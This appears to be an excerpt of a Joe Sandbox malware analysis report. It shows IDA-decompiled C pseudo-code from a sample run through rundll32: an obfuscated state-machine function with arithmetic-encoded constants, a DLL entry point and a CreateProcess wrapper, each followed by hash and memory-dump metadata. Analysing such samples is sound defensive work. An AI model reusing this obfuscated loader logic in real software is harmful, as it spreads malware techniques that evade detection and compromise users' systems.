                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _v1672;
                                                                                                                      				signed int _v1676;
                                                                                                                      				signed int _v1680;
                                                                                                                      				signed int _v1684;
                                                                                                                      				signed int _v1688;
                                                                                                                      				signed int _v1692;
                                                                                                                      				signed int _v1696;
                                                                                                                      				signed int _v1700;
                                                                                                                      				signed short* _t368;
                                                                                                                      				signed int _t381;
                                                                                                                      				signed int* _t383;
                                                                                                                      				signed int _t385;
                                                                                                                      				signed int _t386;
                                                                                                                      				signed int _t387;
                                                                                                                      				signed int _t388;
                                                                                                                      				signed int _t389;
                                                                                                                      				signed int _t390;
                                                                                                                      				signed int _t391;
                                                                                                                      				signed int _t392;
                                                                                                                      				signed int _t393;
                                                                                                                      				signed int _t394;
                                                                                                                      				signed int _t395;
                                                                                                                      				signed int _t405;
                                                                                                                      				signed int* _t438;
                                                                                                                      				void* _t439;
                                                                                                                      				signed short* _t445;
                                                                                                                      				signed int* _t446;
                                                                                                                      
                                                                                                                      				_t446 =  &_v1700;
                                                                                                                      				_v1636 = 0x636551;
                                                                                                                      				_t2 =  &_v1636; // 0x636551
                                                                                                                      				_t385 = 0x5e;
                                                                                                                      				_v1636 =  *_t2 / _t385;
                                                                                                                      				_t383 = 0;
                                                                                                                      				_t386 = 0x7a;
                                                                                                                      				_t439 = 0x12dab9f;
                                                                                                                      				_v1636 = _v1636 * 0x55;
                                                                                                                      				_v1636 = _v1636 ^ 0x0059e0ec;
                                                                                                                      				_v1616 = 0x84ec4b;
                                                                                                                      				_v1616 = _v1616 + 0xffff958e;
                                                                                                                      				_v1616 = _v1616 << 6;
                                                                                                                      				_v1616 = _v1616 ^ 0x212f9cfc;
                                                                                                                      				_v1624 = 0x57c2af;
                                                                                                                      				_v1624 = _v1624 / _t386;
                                                                                                                      				_v1624 = _v1624 >> 0xa;
                                                                                                                      				_v1624 = _v1624 ^ 0x000a9340;
                                                                                                                      				_v1676 = 0x94d6a3;
                                                                                                                      				_v1676 = _v1676 >> 3;
                                                                                                                      				_t387 = 0x41;
                                                                                                                      				_v1676 = _v1676 * 0x79;
                                                                                                                      				_v1676 = _v1676 * 0x68;
                                                                                                                      				_v1676 = _v1676 ^ 0x9280c2f7;
                                                                                                                      				_v1644 = 0x578290;
                                                                                                                      				_v1644 = _v1644 | 0x80e552f7;
                                                                                                                      				_v1644 = _v1644 + 0xffffd80b;
                                                                                                                      				_v1644 = _v1644 ^ 0x80feae5e;
                                                                                                                      				_v1652 = 0x70c956;
                                                                                                                      				_v1652 = _v1652 ^ 0x31ba76f8;
                                                                                                                      				_v1652 = _v1652 ^ 0x87f2510e;
                                                                                                                      				_v1652 = _v1652 ^ 0xb63594c0;
                                                                                                                      				_v1696 = 0x39dcdb;
                                                                                                                      				_v1696 = _v1696 * 0x22;
                                                                                                                      				_v1696 = _v1696 >> 0xf;
                                                                                                                      				_v1696 = _v1696 * 0x75;
                                                                                                                      				_v1696 = _v1696 ^ 0x000247c6;
                                                                                                                      				_v1572 = 0x793846;
                                                                                                                      				_v1572 = _v1572 + 0xfc60;
                                                                                                                      				_v1572 = _v1572 ^ 0x007fa213;
                                                                                                                      				_v1576 = 0x3629f6;
                                                                                                                      				_v1576 = _v1576 | 0x7f6cc17b;
                                                                                                                      				_v1576 = _v1576 ^ 0x7f7c74a2;
                                                                                                                      				_v1600 = 0x630dc0;
                                                                                                                      				_v1600 = _v1600 | 0x8a3170d6;
                                                                                                                      				_v1600 = _v1600 ^ 0x8a7fe201;
                                                                                                                      				_v1664 = 0xe79625;
                                                                                                                      				_v1664 = _v1664 * 0x57;
                                                                                                                      				_v1664 = _v1664 ^ 0xe47ae09a;
                                                                                                                      				_v1664 = _v1664 + 0xffff598f;
                                                                                                                      				_v1664 = _v1664 ^ 0xaac0e7d1;
                                                                                                                      				_v1648 = 0xac147c;
                                                                                                                      				_v1648 = _v1648 << 4;
                                                                                                                      				_v1648 = _v1648 / _t387;
                                                                                                                      				_v1648 = _v1648 ^ 0x00264750;
                                                                                                                      				_v1588 = 0x745952;
                                                                                                                      				_t98 =  &_v1588; // 0x745952
                                                                                                                      				_v1588 =  *_t98 * 0x3a;
                                                                                                                      				_v1588 = _v1588 ^ 0x1a53f4d8;
                                                                                                                      				_v1672 = 0x57a21b;
                                                                                                                      				_t388 = 0x49;
                                                                                                                      				_v1672 = _v1672 / _t388;
                                                                                                                      				_t389 = 0x63;
                                                                                                                      				_v1672 = _v1672 / _t389;
                                                                                                                      				_v1672 = _v1672 | 0xd6f4ed27;
                                                                                                                      				_v1672 = _v1672 ^ 0xd6feee0f;
                                                                                                                      				_v1620 = 0xc904e8;
                                                                                                                      				_t390 = 0x17;
                                                                                                                      				_v1620 = _v1620 * 0x6d;
                                                                                                                      				_v1620 = _v1620 + 0x178d;
                                                                                                                      				_v1620 = _v1620 ^ 0x5592dda0;
                                                                                                                      				_v1688 = 0x59d198;
                                                                                                                      				_v1688 = _v1688 | 0x5938a823;
                                                                                                                      				_v1688 = _v1688 ^ 0x788d0eee;
                                                                                                                      				_v1688 = _v1688 + 0xffff1978;
                                                                                                                      				_v1688 = _v1688 ^ 0x21fe2fab;
                                                                                                                      				_v1612 = 0xa097a2;
                                                                                                                      				_v1612 = _v1612 << 9;
                                                                                                                      				_v1612 = _v1612 / _t390;
                                                                                                                      				_v1612 = _v1612 ^ 0x02dc2d90;
                                                                                                                      				_v1700 = 0xb7b4a0;
                                                                                                                      				_t391 = 0x36;
                                                                                                                      				_v1700 = _v1700 / _t391;
                                                                                                                      				_v1700 = _v1700 >> 1;
                                                                                                                      				_v1700 = _v1700 | 0xee164e4b;
                                                                                                                      				_v1700 = _v1700 ^ 0xee1e6de5;
                                                                                                                      				_v1680 = 0xe4ad14;
                                                                                                                      				_v1680 = _v1680 | 0xe839ddc8;
                                                                                                                      				_v1680 = _v1680 ^ 0xfe881b96;
                                                                                                                      				_t392 = 0x42;
                                                                                                                      				_v1680 = _v1680 * 0x4e;
                                                                                                                      				_v1680 = _v1680 ^ 0xd7ed2c6e;
                                                                                                                      				_v1656 = 0xa710a4;
                                                                                                                      				_v1656 = _v1656 + 0xfffff8f1;
                                                                                                                      				_v1656 = _v1656 ^ 0xcc5b21c1;
                                                                                                                      				_v1656 = _v1656 ^ 0xccf98fb8;
                                                                                                                      				_v1628 = 0x5fc40d;
                                                                                                                      				_v1628 = _v1628 + 0xb682;
                                                                                                                      				_v1628 = _v1628 << 6;
                                                                                                                      				_v1628 = _v1628 ^ 0x181c8c04;
                                                                                                                      				_v1640 = 0xd7aa78;
                                                                                                                      				_v1640 = _v1640 + 0x8e1d;
                                                                                                                      				_v1640 = _v1640 / _t392;
                                                                                                                      				_v1640 = _v1640 ^ 0x0007a72a;
                                                                                                                      				_v1580 = 0xbf48f6;
                                                                                                                      				_t393 = 0x25;
                                                                                                                      				_v1580 = _v1580 * 0xd;
                                                                                                                      				_v1580 = _v1580 ^ 0x09b7b49e;
                                                                                                                      				_v1564 = 0xff195;
                                                                                                                      				_v1564 = _v1564 + 0x8c1b;
                                                                                                                      				_v1564 = _v1564 ^ 0x00104e06;
                                                                                                                      				_v1684 = 0xbf1e83;
                                                                                                                      				_v1684 = _v1684 / _t393;
                                                                                                                      				_t394 = 0x77;
                                                                                                                      				_v1684 = _v1684 / _t394;
                                                                                                                      				_v1684 = _v1684 + 0xa662;
                                                                                                                      				_v1684 = _v1684 ^ 0x0006fc0d;
                                                                                                                      				_v1596 = 0xc39bae;
                                                                                                                      				_v1596 = _v1596 << 2;
                                                                                                                      				_v1596 = _v1596 ^ 0x030cfbaf;
                                                                                                                      				_v1568 = 0x66568e;
                                                                                                                      				_v1568 = _v1568 | 0x44ac0d6e;
                                                                                                                      				_v1568 = _v1568 ^ 0x44e9cf2b;
                                                                                                                      				_v1692 = 0x3d2b27;
                                                                                                                      				_v1692 = _v1692 + 0x3fae;
                                                                                                                      				_t395 = 0x71;
                                                                                                                      				_v1692 = _v1692 / _t395;
                                                                                                                      				_v1692 = _v1692 + 0xffff1a11;
                                                                                                                      				_v1692 = _v1692 ^ 0xffffbf57;
                                                                                                                      				_v1632 = 0xb4dfda;
                                                                                                                      				_v1632 = _v1632 * 9;
                                                                                                                      				_v1632 = _v1632 >> 3;
                                                                                                                      				_v1632 = _v1632 ^ 0x00c4553b;
                                                                                                                      				_v1584 = 0x206e7a;
                                                                                                                      				_v1584 = _v1584 << 7;
                                                                                                                      				_v1584 = _v1584 ^ 0x10371375;
                                                                                                                      				_v1592 = 0x689459;
                                                                                                                      				_v1592 = _v1592 + 0xffffb773;
                                                                                                                      				_v1592 = _v1592 ^ 0x00637077;
                                                                                                                      				_v1660 = 0x8b14df;
                                                                                                                      				_v1660 = _v1660 << 0xd;
                                                                                                                      				_v1660 = _v1660 + 0x9803;
                                                                                                                      				_v1660 = _v1660 << 0xa;
                                                                                                                      				_v1660 = _v1660 ^ 0x71eeeb6f;
                                                                                                                      				_v1608 = 0x8e767e;
                                                                                                                      				_v1608 = _v1608 | 0xfaf7fbb6;
                                                                                                                      				_v1608 = _v1608 ^ 0xfaf9bdf5;
                                                                                                                      				_v1668 = 0xccd677;
                                                                                                                      				_v1668 = _v1668 * 0x78;
                                                                                                                      				_v1668 = _v1668 + 0xffff6b3d;
                                                                                                                      				_v1668 = _v1668 + 0xf0ff;
                                                                                                                      				_v1668 = _v1668 ^ 0x600a3b9e;
                                                                                                                      				_v1604 = 0x7c05f9;
                                                                                                                      				_v1604 = _v1604 + 0xd55a;
                                                                                                                      				_v1604 = _v1604 ^ 0x007aedaa;
                                                                                                                      				_t445 = _v1604;
                                                                                                                      				while(_t439 != 0x12dab9f) {
                                                                                                                      					if(_t439 == 0x2f8e73a) {
                                                                                                                      						_push(_v1604);
                                                                                                                      						_push(_t383);
                                                                                                                      						_push(_t395);
                                                                                                                      						_push(_t383);
                                                                                                                      						_push(_t383);
                                                                                                                      						_push(_v1668);
                                                                                                                      						_push(_t445);
                                                                                                                      						E0068AB87(_v1660, _v1608, __eflags);
                                                                                                                      						_t383 = 1;
                                                                                                                      						__eflags = 1;
                                                                                                                      						L23:
                                                                                                                      						return _t383;
                                                                                                                      					}
                                                                                                                      					if(_t439 == 0x92208ae) {
                                                                                                                      						_t368 = _t445;
                                                                                                                      						__eflags =  *_t445 - _t383;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							L18:
                                                                                                                      							_t439 = 0xeef82b0;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							goto L11;
                                                                                                                      						}
                                                                                                                      						do {
                                                                                                                      							L11:
                                                                                                                      							__eflags =  *_t368 - 0x2c;
                                                                                                                      							if( *_t368 != 0x2c) {
                                                                                                                      								goto L17;
                                                                                                                      							}
                                                                                                                      							_t438 =  &_v1560;
                                                                                                                      							while(1) {
                                                                                                                      								_t368 =  &(_t368[1]);
                                                                                                                      								_t405 =  *_t368 & 0x0000ffff;
                                                                                                                      								__eflags = _t405;
                                                                                                                      								if(_t405 == 0) {
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								__eflags = _t405 - 0x20;
                                                                                                                      								if(_t405 == 0x20) {
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								 *_t438 = _t405;
                                                                                                                      								_t438 =  &(_t438[0]);
                                                                                                                      								__eflags = _t438;
                                                                                                                      							}
                                                                                                                      							_t395 = 0;
                                                                                                                      							__eflags = 0;
                                                                                                                      							 *_t438 = 0;
                                                                                                                      							L17:
                                                                                                                      							_t368 =  &(_t368[1]);
                                                                                                                      							__eflags =  *_t368 - _t383;
                                                                                                                      						} while (__eflags != 0);
                                                                                                                      						goto L18;
                                                                                                                      					}
                                                                                                                      					if(_t439 == 0x99a67ee) {
                                                                                                                      						_t445 = E0068F899(_t395);
                                                                                                                      						_t439 = 0x92208ae;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t439 == 0x9e65a83) {
                                                                                                                      						_push(_v1612);
                                                                                                                      						_push(_v1636);
                                                                                                                      						_push(_v1688);
                                                                                                                      						_push( &_v520); // executed
                                                                                                                      						E006946BB(_v1672, _v1620); // executed
                                                                                                                      						E0069DA22(_v1700, _v1680, __eflags, _v1656,  &_v1040, _v1672, _v1628);
                                                                                                                      						_push(_v1564);
                                                                                                                      						_push(_v1580);
                                                                                                                      						E006847CE( &_v520, _v1684, _v1640, _v1596, _v1568, E0069DCF7(_v1640, 0x681140, __eflags),  &_v1040, _v1692, _v1632);
                                                                                                                      						_t395 = _v1584;
                                                                                                                      						E0068A8B0(_t395, _t375, _v1592);
                                                                                                                      						_t446 = _t446 - 0xc + 0x58;
                                                                                                                      						_t439 = 0x2f8e73a;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					_t457 = _t439 - 0xeef82b0;
                                                                                                                      					if(_t439 == 0xeef82b0) {
                                                                                                                      						_push(_v1696);
                                                                                                                      						_push(_v1652);
                                                                                                                      						_t381 = E0068B23C(_v1572, _v1576, E0069DCF7(_v1644, 0x6810c0, _t457), _v1600, _v1664,  &_v1560); // executed
                                                                                                                      						_t395 = _v1648;
                                                                                                                      						asm("sbb edi, edi");
                                                                                                                      						_t439 = ( ~_t381 & 0xfbf501ac) + 0xdf158d7;
                                                                                                                      						E0068A8B0(_t395, _t379, _v1588);
                                                                                                                      						_t446 =  &(_t446[7]);
                                                                                                                      					}
                                                                                                                      					L20:
                                                                                                                      					if(_t439 != 0xdf158d7) {
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L23;
                                                                                                                      				}
                                                                                                                      				E00684B61( &_v1560, 0x208, _v1616, _v1624);
                                                                                                                      				_pop(_t395);
                                                                                                                      				_t439 = 0x99a67ee;
                                                                                                                      				goto L20;
                                                                                                                      			}

                                                                                                                      0x0068ffcf
                                                                                                                      0x0068ffb7
                                                                                                                      0x0068ffbd
                                                                                                                      0x0068ffbe
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: '+=$F8y$PG&$Qec$RYt$oq$wpc$zn $Y
                                                                                                                      • API String ID: 1514166925-3316477785
                                                                                                                      • Opcode ID: 3562b1b7ee831dc5338ef42fb802357a477fd48f4fe694197a832d0eec97edce
                                                                                                                      • Instruction ID: f66ccce56fa6f67d836530f66ef75ff0af5622f1ef135dfe3eccb3d0f90f729a
                                                                                                                      • Opcode Fuzzy Hash: 3562b1b7ee831dc5338ef42fb802357a477fd48f4fe694197a832d0eec97edce
                                                                                                                      • Instruction Fuzzy Hash: 6F0220725083808FD368DF25C58AA5BFBE2BBC5718F108A1DF29986260D7B58909CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 267 68e991-68ea60 268 68ea90-68ea96 267->268 269 68ea62-68ea77 call 68f8fd 267->269 269->268 272 68ea79-68ea88 call 6893ed 269->272 274 68ea8d 272->274 274->268
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			_entry_(intOrPtr _a4, char _a8) {
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				intOrPtr _v36;
                                                                                                                      				intOrPtr _v40;
                                                                                                                      				intOrPtr _v44;
                                                                                                                      				signed int _t85;
                                                                                                                      				signed int _t86;
                                                                                                                      				signed int _t87;
                                                                                                                      
                                                                                                                      				_v32 = _v32 & 0x00000000;
                                                                                                                      				_v44 = 0xa88528;
                                                                                                                      				_v40 = 0x811176;
                                                                                                                      				_v36 = 0xed2c64;
                                                                                                                      				_v20 = 0x893932;
                                                                                                                      				_v20 = _v20 ^ 0x2faf083b;
                                                                                                                      				_v20 = _v20 ^ 0x2f2d1c53;
                                                                                                                      				_v8 = 0xbe2d1;
                                                                                                                      				_t85 = 0x2e;
                                                                                                                      				_v8 = _v8 / _t85;
                                                                                                                      				_v8 = _v8 >> 0xd;
                                                                                                                      				_v8 = _v8 + 0xffff961f;
                                                                                                                      				_v8 = _v8 ^ 0xfff451d0;
                                                                                                                      				_v16 = 0x50855f;
                                                                                                                      				_v16 = _v16 >> 8;
                                                                                                                      				_t86 = 0x5e;
                                                                                                                      				_v16 = _v16 / _t86;
                                                                                                                      				_v16 = _v16 ^ 0x0002614f;
                                                                                                                      				_v28 = 0x752e5d;
                                                                                                                      				_t36 =  &_v28; // 0x752e5d
                                                                                                                      				_t87 = 0x4e;
                                                                                                                      				_v28 =  *_t36 * 0x6f;
                                                                                                                      				_v28 = _v28 ^ 0x32c1ec83;
                                                                                                                      				_v12 = 0xba9db2;
                                                                                                                      				_v12 = _v12 * 0x41;
                                                                                                                      				_v12 = _v12 + 0xfc46;
                                                                                                                      				_v12 = _v12 | 0x4911db39;
                                                                                                                      				_v12 = _v12 ^ 0x6f7f0271;
                                                                                                                      				_v24 = 0x2e0372;
                                                                                                                      				_v24 = _v24 / _t87;
                                                                                                                      				_v24 = _v24 ^ 0x000c7ca5;
                                                                                                                      				_t58 =  &_a8;
                                                                                                                      				 *_t58 = _a8 - 1;
                                                                                                                      				if( *_t58 == 0) {
                                                                                                                      					 *0x6a320c = _a4;
                                                                                                                      					if(E0068F8FD() != 0) {
                                                                                                                      						E006893ED(); // executed
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				return 1;
                                                                                                                      			}

















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID: ].u$d,
                                                                                                                      • API String ID: 621844428-1507873175
                                                                                                                      • Opcode ID: 0df557825779708a2557ad697d612d148ebbab9498a02927856f9017dad73459
                                                                                                                      • Instruction ID: 6c2c886440244011c91e533b1599dcf7a2f1a099c6970a7466d3911a928caa72
                                                                                                                      • Opcode Fuzzy Hash: 0df557825779708a2557ad697d612d148ebbab9498a02927856f9017dad73459
                                                                                                                      • Instruction Fuzzy Hash: 433106B1D00209EBDB08DFA4C98A5DEBFF1FB55304F208199D510BB250D7B45B859F80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 288 68ab87-68ad94 call 6920b9 call 684b61 call 687f5d 294 68ad99-68ad9e 288->294 295 68addd 294->295 296 68ada0-68ada2 294->296 297 68addf-68ade5 295->297 298 68adb0-68addb call 691e67 * 2 296->298 299 68ada4-68adaa 296->299 300 68adab-68adae 298->300 299->300 300->297
                                                                                                                      C-Code - Quality: 72%
                                                                                                                      			E0068AB87(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                      				void* _t151;
                                                                                                                      				void* _t163;
                                                                                                                      				void* _t164;
                                                                                                                      				signed int _t169;
                                                                                                                      				signed int _t170;
                                                                                                                      				signed int _t171;
                                                                                                                      				intOrPtr _t187;
                                                                                                                      				intOrPtr _t190;
                                                                                                                      				intOrPtr* _t193;
                                                                                                                      				void* _t194;
                                                                                                                      
                                                                                                                      				_t193 = _t194 - 0x5c;
                                                                                                                      				_push( *((intOrPtr*)(_t193 + 0x7c)));
                                                                                                                      				_t187 =  *((intOrPtr*)(_t193 + 0x6c));
                                                                                                                      				_push( *((intOrPtr*)(_t193 + 0x78)));
                                                                                                                      				_push(0);
                                                                                                                      				_push( *((intOrPtr*)(_t193 + 0x70)));
                                                                                                                      				_push(_t187);
                                                                                                                      				_push( *((intOrPtr*)(_t193 + 0x68)));
                                                                                                                      				_push( *((intOrPtr*)(_t193 + 0x64)));
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t151);
                                                                                                                      				 *(_t193 + 0x18) =  *(_t193 + 0x18) & 0x00000000;
                                                                                                                      				 *((intOrPtr*)(_t193 + 0xc)) = 0xc7e504;
                                                                                                                      				 *((intOrPtr*)(_t193 + 0x10)) = 0xaf8af2;
                                                                                                                      				 *((intOrPtr*)(_t193 + 0x14)) = 0x514a6e;
                                                                                                                      				 *(_t193 + 0x34) = 0xb35e3d;
                                                                                                                      				 *(_t193 + 0x34) =  *(_t193 + 0x34) >> 0xc;
                                                                                                                      				 *(_t193 + 0x34) =  *(_t193 + 0x34) ^ 0x00059917;
                                                                                                                      				 *(_t193 + 0x1c) = 0xb39a57;
                                                                                                                      				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb15fb5d5;
                                                                                                                      				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb1e87bcb;
                                                                                                                      				 *(_t193 + 0x54) = 0x8cfebd;
                                                                                                                      				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x2de11ebd;
                                                                                                                      				 *(_t193 + 0x54) =  *(_t193 + 0x54) >> 7;
                                                                                                                      				_t169 = 0x1d;
                                                                                                                      				 *(_t193 + 0x54) =  *(_t193 + 0x54) / _t169;
                                                                                                                      				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x0009bd52;
                                                                                                                      				 *(_t193 + 0x24) = 0xadd23a;
                                                                                                                      				 *(_t193 + 0x24) =  *(_t193 + 0x24) + 0xffffea89;
                                                                                                                      				 *(_t193 + 0x24) =  *(_t193 + 0x24) ^ 0x00a2a736;
                                                                                                                      				 *(_t193 + 0x20) = 0x1d5481;
                                                                                                                      				 *(_t193 + 0x20) =  *(_t193 + 0x20) | 0x53ff6cee;
                                                                                                                      				 *(_t193 + 0x20) =  *(_t193 + 0x20) ^ 0x53f584ee;
                                                                                                                      				 *(_t193 + 0x2c) = 0x3c40b3;
                                                                                                                      				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) + 0xffffdf55;
                                                                                                                      				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) ^ 0x0031ac36;
                                                                                                                      				 *(_t193 + 0x3c) = 0x52e0cb;
                                                                                                                      				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44a49456;
                                                                                                                      				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44f1a540;
                                                                                                                      				 *(_t193 + 0x4c) = 0x46a878;
                                                                                                                      				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) << 0xf;
                                                                                                                      				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) + 0xffff6c50;
                                                                                                                      				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) ^ 0x5431f96e;
                                                                                                                      				 *(_t193 + 0x30) = 0x13da24;
                                                                                                                      				 *(_t193 + 0x30) =  *(_t193 + 0x30) << 1;
                                                                                                                      				 *(_t193 + 0x30) =  *(_t193 + 0x30) ^ 0x002ba36f;
                                                                                                                      				 *(_t193 + 0x44) = 0xdb90c5;
                                                                                                                      				 *(_t193 + 0x44) =  *(_t193 + 0x44) << 0xf;
                                                                                                                      				 *(_t193 + 0x44) =  *(_t193 + 0x44) + 0x7bf2;
                                                                                                                      				 *(_t193 + 0x44) =  *(_t193 + 0x44) ^ 0xc86621d2;
                                                                                                                      				 *(_t193 + 0x38) = 0xc3d0db;
                                                                                                                      				 *(_t193 + 0x38) =  *(_t193 + 0x38) << 0xf;
                                                                                                                      				 *(_t193 + 0x38) =  *(_t193 + 0x38) ^ 0xe86994ab;
                                                                                                                      				 *(_t193 + 0x58) = 0x1a470a;
                                                                                                                      				 *(_t193 + 0x58) =  *(_t193 + 0x58) << 1;
                                                                                                                      				 *(_t193 + 0x58) =  *(_t193 + 0x58) + 0x63a7;
                                                                                                                      				 *(_t193 + 0x58) =  *(_t193 + 0x58) | 0x340679df;
                                                                                                                      				 *(_t193 + 0x58) =  *(_t193 + 0x58) ^ 0x343a3883;
                                                                                                                      				 *(_t193 + 0x40) = 0xc6f633;
                                                                                                                      				 *(_t193 + 0x40) =  *(_t193 + 0x40) << 3;
                                                                                                                      				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x74163c66;
                                                                                                                      				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x722ef2ae;
                                                                                                                      				 *(_t193 + 0x50) = 0xa2e0bb;
                                                                                                                      				_t170 = 0x56;
                                                                                                                      				 *(_t193 + 0x50) =  *(_t193 + 0x50) / _t170;
                                                                                                                      				 *(_t193 + 0x50) =  *(_t193 + 0x50) + 0x1f8a;
                                                                                                                      				 *(_t193 + 0x50) =  *(_t193 + 0x50) * 0x7f;
                                                                                                                      				 *(_t193 + 0x50) =  *(_t193 + 0x50) ^ 0x01094e1c;
                                                                                                                      				 *(_t193 + 0x28) = 0x4b9267;
                                                                                                                      				_t171 = 0x28;
                                                                                                                      				_t115 = _t193 - 0x48; // 0x181c8bbc
                                                                                                                      				_t172 = _t115;
                                                                                                                      				 *(_t193 + 0x28) =  *(_t193 + 0x28) / _t171;
                                                                                                                      				 *(_t193 + 0x28) =  *(_t193 + 0x28) ^ 0x00093005;
                                                                                                                      				 *(_t193 + 0x48) = 0xd50758;
                                                                                                                      				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0x7d3d0603;
                                                                                                                      				 *(_t193 + 0x48) =  *(_t193 + 0x48) << 9;
                                                                                                                      				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0xd00f781a;
                                                                                                                      				_push( *(_t193 + 0x1c));
                                                                                                                      				_push( *(_t193 + 0x34));
                                                                                                                      				_t190 = 0x44;
                                                                                                                      				E00684B61(_t115, _t190);
                                                                                                                      				 *((intOrPtr*)(_t193 - 0x48)) = _t190;
                                                                                                                      				_t129 = _t193 - 4; // 0x181c8c00
                                                                                                                      				_t131 = _t193 - 0x48; // 0x181c8bbc
                                                                                                                      				_t163 = E00687F5D(_t115, _t172,  *((intOrPtr*)(_t193 + 0x70)), _t172, _t131, _t172, _t172,  *((intOrPtr*)(_t193 + 0x64)),  *(_t193 + 0x24),  *(_t193 + 0x20),  *(_t193 + 0x2c),  *(_t193 + 0x3c),  *(_t193 + 0x4c),  *((intOrPtr*)(_t193 + 0x78)), _t129); // executed
                                                                                                                      				if(_t163 == 0) {
                                                                                                                      					_t164 = 0;
                                                                                                                      				} else {
                                                                                                                      					if(_t187 == 0) {
                                                                                                                      						E00691E67( *(_t193 + 0x30),  *(_t193 + 0x44),  *(_t193 + 0x38),  *(_t193 + 0x58),  *((intOrPtr*)(_t193 - 4)));
                                                                                                                      						E00691E67( *(_t193 + 0x40),  *(_t193 + 0x50),  *(_t193 + 0x28),  *(_t193 + 0x48),  *_t193);
                                                                                                                      					} else {
                                                                                                                      						asm("movsd");
                                                                                                                      						asm("movsd");
                                                                                                                      						asm("movsd");
                                                                                                                      						asm("movsd");
                                                                                                                      					}
                                                                                                                      					_t164 = 1;
                                                                                                                      				}
                                                                                                                      				return _t164;
                                                                                                                      			}














                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID: nJQ
                                                                                                                      • API String ID: 963392458-2884827605
                                                                                                                      • Opcode ID: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
                                                                                                                      • Instruction ID: ff624fbe9920c2629ab99dbfa1ee3e4b2646eaa36d5b5032a01f25ff072302eb
                                                                                                                      • Opcode Fuzzy Hash: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
                                                                                                                      • Instruction Fuzzy Hash: FA71F27240028CEBCF59DFA4C9498CE3BA6FF48358F108219FE1696220D3B6C969DF45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
